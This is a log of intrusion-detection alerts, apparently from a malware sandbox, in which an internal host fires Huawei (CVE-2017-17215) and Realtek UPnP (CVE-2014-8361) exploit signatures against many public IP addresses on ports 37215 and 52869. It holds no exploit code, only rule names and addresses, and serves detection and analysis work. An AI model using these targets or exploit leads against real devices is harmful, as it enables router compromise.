                                                07/20/24-23:05:42.135703TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5313237215192.168.2.1441.33.26.97
                                                07/20/24-23:06:03.123567TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614261652869192.168.2.14213.59.160.112
                                                07/20/24-23:05:47.502937TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615630452869192.168.2.14189.210.242.78
                                                07/20/24-23:06:01.180750TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4800452869192.168.2.14133.227.108.255
                                                07/20/24-23:05:37.450149TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23612052869192.168.2.14146.54.174.109
                                                07/20/24-23:05:42.245742TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4658237215192.168.2.1441.13.71.145
                                                07/20/24-23:05:48.775023TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5122437215192.168.2.1441.200.136.101
                                                07/20/24-23:05:40.407056TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3545052869192.168.2.1412.103.8.219
                                                07/20/24-23:06:11.511898TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5789252869192.168.2.14123.24.215.201
                                                07/20/24-23:05:37.440705TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25021252869192.168.2.1451.192.83.103
                                                07/20/24-23:06:01.285913TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4948852869192.168.2.1412.150.40.173
                                                07/20/24-23:05:45.447173TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5253637215192.168.2.14197.24.23.238
                                                07/20/24-23:05:37.440253TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25733652869192.168.2.14176.224.174.174
                                                07/20/24-23:05:46.135626TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3790237215192.168.2.1413.230.90.211
                                                07/20/24-23:05:58.771763TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615424652869192.168.2.1423.176.211.236
                                                07/20/24-23:05:48.053184TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615748052869192.168.2.14154.45.85.205
                                                07/20/24-23:06:12.589035TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3325652869192.168.2.1459.78.96.71
                                                07/20/24-23:05:33.861088TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4936237215192.168.2.14185.101.34.75
                                                07/20/24-23:05:56.214861TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5878637215192.168.2.1441.49.210.9
                                                07/20/24-23:05:58.165543TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3820252869192.168.2.1412.80.117.177
                                                07/20/24-23:06:33.955473TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3428452869192.168.2.1474.208.169.182
                                                07/20/24-23:06:01.207185TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614198252869192.168.2.14148.3.120.99
                                                07/20/24-23:05:57.599613TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25934452869192.168.2.14107.22.142.143
                                                07/20/24-23:06:18.420370TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4596652869192.168.2.1435.63.184.244
                                                07/20/24-23:05:58.417625TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615243652869192.168.2.14217.8.249.6
                                                07/20/24-23:05:39.181981TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615905652869192.168.2.1461.50.146.33
                                                07/20/24-23:05:52.488878TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5723452869192.168.2.1448.13.21.145
                                                07/20/24-23:05:59.464785TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5271652869192.168.2.14174.36.34.226
                                                07/20/24-23:05:45.389146TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3672437215192.168.2.14197.120.37.59
                                                07/20/24-23:05:56.137269TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3312437215192.168.2.14197.34.124.168
                                                07/20/24-23:05:40.413313TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25212852869192.168.2.14117.40.50.228
                                                07/20/24-23:05:57.540063TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613663452869192.168.2.14122.131.100.31
                                                07/20/24-23:05:40.224363TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616049852869192.168.2.1458.92.201.189
                                                07/20/24-23:06:32.467103TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3457452869192.168.2.1493.45.90.55
                                                07/20/24-23:05:47.103906TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3940037215192.168.2.14157.43.113.62
                                                07/20/24-23:05:38.774187TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4105252869192.168.2.14126.4.218.232
                                                07/20/24-23:06:01.452056TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4568852869192.168.2.14123.159.227.193
                                                07/20/24-23:05:39.777436TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5061837215192.168.2.14217.52.127.251
                                                07/20/24-23:05:57.615698TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613462252869192.168.2.1485.8.43.114
                                                07/20/24-23:05:46.511430TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4782052869192.168.2.1420.25.130.127
                                                07/20/24-23:06:16.113186TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23616252869192.168.2.14111.11.77.117
                                                07/20/24-23:05:45.403074TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5808837215192.168.2.14157.86.221.236
                                                07/20/24-23:07:01.438133TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5936852869192.168.2.1452.229.50.98
                                                07/20/24-23:06:11.223856TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613992252869192.168.2.14183.168.204.172
                                                07/20/24-23:05:58.922584TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23772452869192.168.2.141.173.175.109
                                                07/20/24-23:06:25.632747TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24066052869192.168.2.14177.192.100.150
                                                07/20/24-23:05:37.520621TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4051452869192.168.2.14197.23.60.58
                                                07/20/24-23:05:33.861088TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5817437215192.168.2.14138.194.165.219
                                                07/20/24-23:05:40.348098TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4547252869192.168.2.1484.235.146.124
                                                07/20/24-23:05:52.557712TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24682652869192.168.2.14187.153.198.62
                                                07/20/24-23:07:03.190387TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615788452869192.168.2.14132.21.47.22
                                                07/20/24-23:06:01.954738TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24263452869192.168.2.14192.59.185.246
                                                07/20/24-23:05:45.383849TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3946437215192.168.2.14197.128.22.128
                                                07/20/24-23:06:02.767606TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25369652869192.168.2.1484.81.98.79
                                                07/20/24-23:06:03.476247TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5162637215192.168.2.1441.102.238.86
                                                07/20/24-23:05:45.405121TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4969237215192.168.2.14206.6.215.158
                                                07/20/24-23:05:47.313425TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5832052869192.168.2.14162.169.7.175
                                                07/20/24-23:05:57.892457TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5714652869192.168.2.14197.203.241.220
                                                07/20/24-23:05:42.136712TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4044037215192.168.2.1463.243.11.1
                                                07/20/24-23:05:40.330643TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4355852869192.168.2.1418.240.153.218
                                                07/20/24-23:06:35.288760TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3415852869192.168.2.14176.160.7.108
                                                07/20/24-23:05:48.795527TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5125037215192.168.2.14197.127.185.220
                                                07/20/24-23:06:34.776991TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25893452869192.168.2.1457.212.53.76
                                                07/20/24-23:05:42.245589TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4404437215192.168.2.14157.5.87.86
                                                07/20/24-23:05:39.050437TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3554237215192.168.2.14157.67.157.233
                                                07/20/24-23:05:39.636140TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615348252869192.168.2.14125.204.161.195
                                                07/20/24-23:06:13.525153TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25473252869192.168.2.14205.249.112.164
                                                07/20/24-23:05:57.111519TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5450852869192.168.2.14111.19.143.182
                                                07/20/24-23:06:00.719355TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3606037215192.168.2.1441.124.13.9
                                                07/20/24-23:06:01.219796TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616027652869192.168.2.145.117.210.100
                                                07/20/24-23:06:01.903540TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3393452869192.168.2.1475.226.205.63
                                                07/20/24-23:05:40.430092TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23814252869192.168.2.14108.93.153.171
                                                07/20/24-23:05:57.549014TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5989452869192.168.2.14162.39.12.155
                                                07/20/24-23:05:39.615596TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4705652869192.168.2.14163.35.26.213
                                                07/20/24-23:06:25.893173TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615846652869192.168.2.1457.212.53.76
                                                07/20/24-23:05:59.915135TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613826052869192.168.2.1452.245.58.49
                                                07/20/24-23:07:08.369781TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5898852869192.168.2.14132.21.47.22
                                                07/20/24-23:05:58.066314TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24655852869192.168.2.14205.22.105.116
                                                07/20/24-23:07:34.551915TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5273052869192.168.2.14179.254.24.143
                                                07/20/24-23:06:01.139544TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615866652869192.168.2.14160.54.17.66
                                                07/20/24-23:05:40.420492TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4708052869192.168.2.144.202.29.142
                                                07/20/24-23:05:47.014311TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4111437215192.168.2.1441.119.148.20
                                                07/20/24-23:05:33.827023TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4859037215192.168.2.14157.183.110.42
                                                07/20/24-23:05:48.756259TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5910437215192.168.2.14197.170.188.98
                                                07/20/24-23:05:57.934535TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614992452869192.168.2.14118.21.82.230
                                                07/20/24-23:05:37.468386TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5087052869192.168.2.1481.167.63.48
                                                07/20/24-23:07:32.121311TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4468452869192.168.2.1481.47.157.203
                                                07/20/24-23:06:07.248816TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614228452869192.168.2.1417.191.215.191
                                                07/20/24-23:05:39.536315TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615569252869192.168.2.14192.120.138.130
                                                07/20/24-23:05:57.887085TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3289052869192.168.2.14190.92.119.202
                                                07/20/24-23:05:44.998391TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6085052869192.168.2.1479.20.2.158
                                                07/20/24-23:05:48.072385TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615435852869192.168.2.14171.64.212.60
                                                07/20/24-23:06:01.644646TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614714252869192.168.2.14201.173.204.219
                                                07/20/24-23:06:21.974244TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3989852869192.168.2.14103.65.167.145
                                                07/20/24-23:06:12.620447TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5329052869192.168.2.14140.187.97.113
                                                07/20/24-23:05:48.787750TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4158837215192.168.2.14197.118.203.241
                                                07/20/24-23:05:59.473173TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5958852869192.168.2.14148.241.191.50
                                                07/20/24-23:05:46.340010TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5719452869192.168.2.1460.143.208.198
                                                07/20/24-23:05:59.119354TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615255652869192.168.2.14181.7.176.20
                                                07/20/24-23:05:52.493434TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24957052869192.168.2.1420.25.130.127
                                                07/20/24-23:06:27.685490TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615686852869192.168.2.1471.126.238.212
                                                07/20/24-23:06:14.305121TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616095052869192.168.2.14190.160.217.156
                                                07/20/24-23:06:16.164914TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4297252869192.168.2.14195.40.20.153
                                                07/20/24-23:05:38.939890TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5390637215192.168.2.1441.195.17.140
                                                07/20/24-23:05:58.755466TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3628052869192.168.2.1431.155.247.160
                                                07/20/24-23:06:02.766400TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615829252869192.168.2.14132.45.253.181
                                                07/20/24-23:05:57.781031TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614925852869192.168.2.14198.211.177.39
                                                07/20/24-23:05:34.662485TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3308837215192.168.2.1478.116.111.6
                                                07/20/24-23:05:35.771029TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4311052869192.168.2.14124.61.165.111
                                                07/20/24-23:05:36.433724TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5650052869192.168.2.14218.210.113.18
                                                07/20/24-23:05:56.997704TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613708252869192.168.2.1417.219.48.33
                                                07/20/24-23:07:23.347168TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3594852869192.168.2.14117.127.16.156
                                                07/20/24-23:05:50.533759TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5501437215192.168.2.14176.107.182.178
                                                07/20/24-23:05:33.863090TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3924637215192.168.2.14158.245.1.223
                                                07/20/24-23:06:03.014484TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25981652869192.168.2.1464.149.50.56
                                                07/20/24-23:05:38.950380TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4696237215192.168.2.1441.196.84.124
                                                07/20/24-23:05:47.965423TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4491052869192.168.2.14223.10.185.52
                                                07/20/24-23:05:42.220683TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5433037215192.168.2.14197.37.108.11
                                                07/20/24-23:05:59.324561TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5402452869192.168.2.1459.108.150.126
                                                07/20/24-23:05:48.121390TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614465452869192.168.2.1412.241.78.51
                                                07/20/24-23:05:36.324524TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3849837215192.168.2.1441.19.128.6
                                                07/20/24-23:06:05.271056TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613708452869192.168.2.1436.65.172.137
                                                07/20/24-23:05:47.014311TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5437437215192.168.2.14197.54.68.56
                                                07/20/24-23:05:39.537505TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614225852869192.168.2.1473.20.147.180
                                                07/20/24-23:06:01.893151TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613279852869192.168.2.14118.206.217.195
                                                07/20/24-23:06:03.467179TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5631052869192.168.2.14202.237.8.144
                                                07/20/24-23:05:47.264642TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615934452869192.168.2.1413.143.242.72
                                                07/20/24-23:05:33.831807TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3952237215192.168.2.14157.129.24.89
                                                07/20/24-23:05:47.103906TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5734637215192.168.2.14197.49.72.236
                                                07/20/24-23:05:50.515352TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5726237215192.168.2.1460.221.65.154
                                                07/20/24-23:05:52.528818TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4436652869192.168.2.14154.135.195.193
                                                07/20/24-23:05:48.780090TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4724437215192.168.2.14157.153.199.206
                                                07/20/24-23:05:57.017539TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5502452869192.168.2.14196.217.33.59
                                                07/20/24-23:06:03.296826TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5469652869192.168.2.14158.91.168.95
                                                07/20/24-23:06:07.419849TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5354437215192.168.2.1467.68.67.36
                                                07/20/24-23:06:10.391415TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615601252869192.168.2.14149.73.181.225
                                                07/20/24-23:05:39.587933TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614787452869192.168.2.1468.179.40.208
                                                07/20/24-23:05:56.086217TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4535037215192.168.2.14197.154.77.201
                                                07/20/24-23:05:50.522256TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4299837215192.168.2.14197.34.189.184
                                                07/20/24-23:06:02.417792TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3339652869192.168.2.14165.198.98.63
                                                07/20/24-23:05:47.101729TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5736237215192.168.2.14157.219.155.204
                                                07/20/24-23:06:00.078168TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614377252869192.168.2.14187.88.165.50
                                                07/20/24-23:06:09.610819TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4017252869192.168.2.14162.172.126.29
                                                07/20/24-23:06:13.581565TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24708652869192.168.2.1459.97.251.204
                                                07/20/24-23:05:33.830570TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5609237215192.168.2.1441.248.234.133
                                                07/20/24-23:05:35.479241TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5948452869192.168.2.14223.12.218.46
                                                07/20/24-23:06:30.483001TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3466852869192.168.2.14149.215.102.200
                                                07/20/24-23:05:59.565815TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23564652869192.168.2.1495.105.177.126
                                                07/20/24-23:05:57.233976TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615936452869192.168.2.1458.37.104.40
                                                07/20/24-23:06:02.093469TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3847452869192.168.2.14101.62.253.33
                                                07/20/24-23:05:52.589589TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4509652869192.168.2.14165.53.50.40
                                                07/20/24-23:05:59.809385TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24052252869192.168.2.14118.95.252.63
                                                07/20/24-23:06:01.368197TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4082452869192.168.2.14210.197.231.89
                                                07/20/24-23:06:08.320378TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5500652869192.168.2.1413.171.239.70
                                                07/20/24-23:05:57.156324TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5558052869192.168.2.14145.10.65.112
                                                07/20/24-23:06:05.867545TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5659252869192.168.2.1451.58.43.253
                                                07/20/24-23:05:56.086216TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3497637215192.168.2.1441.245.216.126
                                                07/20/24-23:06:01.695131TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5094452869192.168.2.1451.105.4.160
                                                07/20/24-23:05:52.488878TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4094052869192.168.2.14169.220.199.128
                                                07/20/24-23:06:03.018252TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5951252869192.168.2.1465.118.0.140
                                                07/20/24-23:06:54.833146TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614720452869192.168.2.1443.191.221.139
                                                07/20/24-23:05:38.933433TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5810237215192.168.2.14157.55.5.162
                                                07/20/24-23:06:00.781631TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24339452869192.168.2.14104.109.248.86
                                                07/20/24-23:05:38.933433TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5851637215192.168.2.14197.178.81.75
                                                07/20/24-23:05:36.332387TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3779637215192.168.2.14157.109.103.136
                                                07/20/24-23:06:04.825020TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24500052869192.168.2.1489.143.75.194
                                                07/20/24-23:05:36.323623TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5629437215192.168.2.14197.239.103.184
                                                07/20/24-23:05:45.345649TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3639237215192.168.2.1441.101.142.243
                                                07/20/24-23:05:59.984660TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615187252869192.168.2.1472.144.78.222
                                                07/20/24-23:05:52.544570TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23728452869192.168.2.14203.182.119.62
                                                07/20/24-23:05:57.133658TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25788852869192.168.2.14198.222.64.107
                                                07/20/24-23:06:17.614211TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613495452869192.168.2.141.239.54.173
                                                07/20/24-23:06:21.974243TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615098852869192.168.2.14148.189.41.218
                                                07/20/24-23:05:35.835422TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614331452869192.168.2.14196.32.183.241
                                                07/20/24-23:05:52.603344TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3573452869192.168.2.14194.214.58.142
                                                07/20/24-23:06:04.098403TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5616852869192.168.2.1438.52.11.189
                                                07/20/24-23:05:57.618622TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613372852869192.168.2.14149.232.29.216
                                                07/20/24-23:05:52.514709TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23358452869192.168.2.14197.130.252.234
